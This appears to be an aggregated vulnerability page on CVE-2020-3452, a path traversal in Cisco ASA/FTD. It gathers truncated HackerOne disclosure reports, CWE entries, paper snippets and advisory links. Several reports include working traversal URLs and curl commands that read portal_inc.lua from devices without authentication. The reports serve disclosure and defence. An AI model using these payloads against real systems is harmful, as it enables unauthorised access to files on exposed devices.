CVE-2020-3452 [CRITICAL] https://████ is vulnerable to cve-2020-3452
https://████ is vulnerable to cve-2020-3452
**Description:**
A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affe
HackerOne
Read-only path traversal (CVE-2020-3452) at https://████████
hackerone·2021-04-02·CVSS 7.5
CVE-2020-3452 [HIGH] Read-only path traversal (CVE-2020-3452) at https://████████
Read-only path traversal (CVE-2020-3452) at https://████████
**Summary:**
I discovered a vulnerability Read-only path traversal (CVE-2020-3452) at https://████████
**Description:**
A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device.
## Impact
An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to vi
HackerOne
Read-only path traversal (CVE-2020-3452) at https://██████.mil
hackerone·2021-04-02·CVSS 7.5
CVE-2020-3452 [HIGH] Read-only path traversal (CVE-2020-3452) at https://██████.mil
Read-only path traversal (CVE-2020-3452) at https://██████.mil
**Summary:**
I discovered a vulnerability Read-only path traversal (CVE-2020-3452) at https://██████████.mil
**Description:**
A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device.
## Impact
An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attack
HackerOne
Read-only path traversal (CVE-2020-3452) at https://█████
hackerone·2021-04-02·CVSS 7.5
CVE-2020-3452 [HIGH] Read-only path traversal (CVE-2020-3452) at https://█████
Read-only path traversal (CVE-2020-3452) at https://█████
**Summary:**
I discovered a vulnerability Read-only path traversal (CVE-2020-3452) at https://███████
**Description:**
A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device.
## Impact
An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view a
HackerOne
[CVE-2020-3452] Unauthenticated file read in Cisco ASA
hackerone·2020-10-16·CVSS 7.5
CVE-2020-3452 [HIGH] [CVE-2020-3452] Unauthenticated file read in Cisco ASA
[CVE-2020-3452] Unauthenticated file read in Cisco ASA
Hey,
I found out that host `████████.mil` was vulnerable to CVE-2020-3452.
You can test it by visiting the URL:
```
https://██████████.mil/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
```
To try it with CURL please run the following command:
```
curl -i -s -k -X $'GET' \
-H $'Host: ███████.mil' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' -H $'Sec-Fetch-Site: none' -H $'Sec-Fetch-Mode: navigate
HackerOne
[██████████.mil] Cisco VPN Service Path Traversal
hackerone·2020-10-16·CVSS 7.5
CVE-2020-3452 [HIGH] [██████████.mil] Cisco VPN Service Path Traversal
[██████████.mil] Cisco VPN Service Path Traversal
Hi team.
# Summary
The Cisco VPN Service at ```██████.mil``` is vulnerable to the CVE-2020-3452 vulnerability, which allows path traversing within the web service's file system on the targeted device.
# Steps to Reproduce
Make a GET request to:
```http
https://███████.mil/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
```
cURL command:
```
curl -i -s -k -X $'GET' \
-H $'Host: █████.mil' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Referer: https://█████.mil/+CSCOE+/logon.html?fcadbadd=
HackerOne
CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower.
hackerone·2020-09-03·CVSS 7.5
CVE-2020-3452 [HIGH] CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower.
CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower.
**Summary:**
#_The affected IP_:
█████
Here is POC of CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower.
For example to read "/+CSCOE+/portal_inc.lua" file.
for example:
████/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
## Suggested Mitigation/Remediation Actions
Cisco has released the fix https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86
## Impact
This vulnerability allows an unauthenticated, remote attacker to perform directory traversal attacks and read sensitive files on the system.
HackerOne
███ is vulnerable to CVE-2020-3452 Read-Only Path Traversal Vulnerability
hackerone·2020-09-03·CVSS 7.5
CVE-2020-3452 [HIGH] ███ is vulnerable to CVE-2020-3452 Read-Only Path Traversal Vulnerability
███ is vulnerable to CVE-2020-3452 Read-Only Path Traversal Vulnerability
**Summary:**
████████ is vulnerable to Read-Only Path Traversal Vulnerability as described at https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86
**Description:**
Get request parameters at the /+CSCOT+/translation-table and the /+CSCOT+/oem-customization are not properly sanitized which allows for reading files within the webroot directory that are not intended to be readable.
According to Cisco:
The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device.
HackerOne
https://█████ is vulnerable to CVE-2020-3452 Read-Only Path Traversal Vulnerability
hackerone·2020-08-13·CVSS 7.5
CVE-2020-3452 [HIGH] https://█████ is vulnerable to CVE-2020-3452 Read-Only Path Traversal Vulnerability
https://█████ is vulnerable to CVE-2020-3452 Read-Only Path Traversal Vulnerability
**Summary:**
https://████████ is vulnerable to a [Read-Only Path Traversal Vulnerability](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86)
**Description:**
Get request parameters at the `/+CSCOT+/translation-table` and the `/+CSCOT+/oem-customization` are not properly sanitized which allows for reading files within the webroot directory that are not intended to be readable.
## Impact
An unauthenticated, remote attacker can read sensitive files located inside the webroot directory.
## Step-by-step Reproduction Instructions
### Using Browser
1. Visit https://██████████/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-l
HackerOne
Path traversal on https://███ allows arbitrary file read (CVE-2020-3452)
hackerone·2020-08-13·CVSS 7.5
CVE-2020-3452 [HIGH] Path traversal on https://███ allows arbitrary file read (CVE-2020-3452)
Path traversal on https://███ allows arbitrary file read (CVE-2020-3452)
**Summary:**
According to Cisco:
A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system.
The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device.
The w
arXiv
CyberSleuth: Autonomous Blue-Team LLM Agent for Web Attack Forensics
arxiv_fulltext·2026-03-05
CyberSleuth: Autonomous Blue-Team LLM Agent for Web Attack Forensics
: Autonomous Blue-Team LLM Agent for Web Attack Forensics
Stefano Fumero
Politecnico di Torino
Kai Huang
Politecnico di Torino
Matteo BoffaCorresponding author: [email protected]
Politecnico di Torino
Danilo Giordano
Politecnico di Torino
Marco Mellia
Politecnico di Torino
Dario Rossi
Huawei Technologies France
## Abstract
Post-mortem analysis of compromised systems is a key aspect of cyber forensics, today a mostly manual, slow, and error-prone task. Agentic AI, i.e., LLM-powered agents, is a promising avenue for automation. However, applying such agents to cybersecurity remains largely unexplored and difficult, as this domain demands long-term reasoning, contextual memory, and consistent evidence correlation -- capabilities that current LLM agents struggle to master.
arXiv
Predicting Known Vulnerabilities from Attack Descriptions Using Sentence Transformers
arxiv_fulltext·2026-02-25
Predicting Known Vulnerabilities from Attack Descriptions Using Sentence Transformers
gobble
Predicting Known Vulnerabilities from Attack Descriptions Using Sentence Transformers
Refat Othman
Ph.D.\ in Advanced-Systems Engineering
38^th Cycle
2026
[02.10.1991]
[Nablus, Palestine]
27.01.2026
[Bolzano, Italy]
Professor Barbara Russo
Professor Bruno Rossi
& Professor Mengyuan Zhang
0000-0003-3791-399X
All rights reserved
[logo]
acknowledgements
My deepest and most sincere gratitude goes to my supervisor, Professor Barbara Russo. Her unwavering support, constant encouragement, and invaluable guidance have been at the heart of this journey. She provided not only the intellectual direction needed to shape this thesis but also the patience and understanding that sustained me through its most challenging phases. Professor Russo gave me the freedom to explore my ideas while
arXiv
From Attack Descriptions to Vulnerabilities: A Sentence Transformer-Based Approach
arxiv_fulltext·2025-09-03
From Attack Descriptions to Vulnerabilities: A Sentence Transformer-Based Approach
frontmatter
From Attack Descriptions to Vulnerabilities: A Sentence Transformer-Based Approach
[label1]Refat Othman
[label1]organization=Free University of Bozen-Bolzano,
city=Bolzano,
postcode=39100,
country=Italy
[label1]Diaeddin Rimawi
[label2]Bruno Rossi
[label2]organization=Masaryk University,
city=Brno,
postcode=60200,
country=Czech Republic
[label1]Barbara Russo
## Abstract
In the domain of security, vulnerabilities frequently remain undetected even after their exploitation.
In this work, vulnerabilities refer to publicly disclosed flaws documented in Common Vulnerabilities and Exposures (CVE) reports.
Establishing a connection between attacks and vulnerabilities is essential for enabling timely incident response, as it provides defenders with immediate, actionable insight
CWE
Improper Input Validation
mitre_cwe
CWE-20 Improper Input Validation
CWE-20: Improper Input Validation
The product receives input or data, but it does
not validate or incorrectly validates that the input has the
properties that are required to process the data safely and
correctly.
Input validation is a frequently-used technique
for checking potentially dangerous inputs in order to
ensure that the inputs are safe for processing within the
code, or when communicating with other components. Input can consist of: raw data - strings, numbers, parameters, file contents, etc. metadata - information about the raw data, such as headers or size Data can be simple or structured. Structured data
can be composed of many nested layers, composed of
combinations of metadata and raw data, with other simple or
structured data. Many properties of raw data or metadata may n
CWE
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
mitre_cwe
CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.
Many file operations are intended to take place within a restricted directory. By using special elements such as ".." and "/" separators, attackers can escape outside of the restricted location to access files or directories that are elsewhere on the system. One of the most common special elements is the "../" sequence, which in most modern operating systems is inte
http://packetstormsecurity.com/files/158646/Cisco-ASA-FTD-Remote-File-Disclosure.htmlhttp://packetstormsecurity.com/files/158647/Cisco-Adaptive-Security-Appliance-Software-9.11-Local-File-Inclusion.htmlhttp://packetstormsecurity.com/files/159523/Cisco-ASA-FTD-9.6.4.42-Path-Traversal.htmlhttp://packetstormsecurity.com/files/160497/Cisco-ASA-9.14.1.10-FTD-6.6.0.1-Path-Traversal.htmlhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86http://packetstormsecurity.com/files/158646/Cisco-ASA-FTD-Remote-File-Disclosure.htmlhttp://packetstormsecurity.com/files/158647/Cisco-Adaptive-Security-Appliance-Software-9.11-Local-File-Inclusion.htmlhttp://packetstormsecurity.com/files/159523/Cisco-ASA-FTD-9.6.4.42-Path-Traversal.htmlhttp://packetstormsecurity.com/files/160497/Cisco-ASA-9.14.1.10-FTD-6.6.0.1-Path-Traversal.htmlhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-3452
2020-07-22
Published
2021-11-03
Added to CISA KEV
Exploited in the wild